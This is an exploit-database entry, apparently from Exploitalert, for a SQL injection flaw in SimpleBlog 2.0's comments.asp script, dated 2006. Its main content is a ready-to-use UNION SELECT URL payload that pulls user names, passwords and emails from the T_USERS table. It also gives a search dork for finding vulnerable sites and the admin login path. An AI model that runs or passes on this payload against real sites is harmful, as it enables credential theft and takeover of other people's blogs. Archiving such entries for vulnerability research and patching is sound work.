SimpleBlog 2.0 <= "comments.asp" SQL Injection Exploit
CVE
Category
Price
Severity
N/A
CWE-89
N/A
High
Author
Risk
Exploitation Type
Date
N/A
High
Remote
2006-09-02
CVSS vector description
Metric
Value
Metric Description
Value Description
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006080149 ########################################################################
########
## ##
## SimpleBlog 2.0 <= "comments.asp" SQL Injection Exploit ##
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
## Credit by | Chironex Fleckeri ##
## Mail | ChironeX.FleckeriX (at) Gmail (dot) Com [email concealed] ##
## Googledork | Powered By SimpleBlog 2.0 ##
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
## ##
########################################################################
########
########################################################################
########################################################################
####
#http://www.target.com/path/comments.asp?id=-1 UNION SELECT ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,uDATECREATED,null,null FROM T_USERS WHERE id=1 #
########################################################################
########################################################################
####
###########################################################
#Admin Panel : http://www.target.com/path/admin/login.asp #
###########################################################
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only.Terms of Use and Privacy Policy and Impressum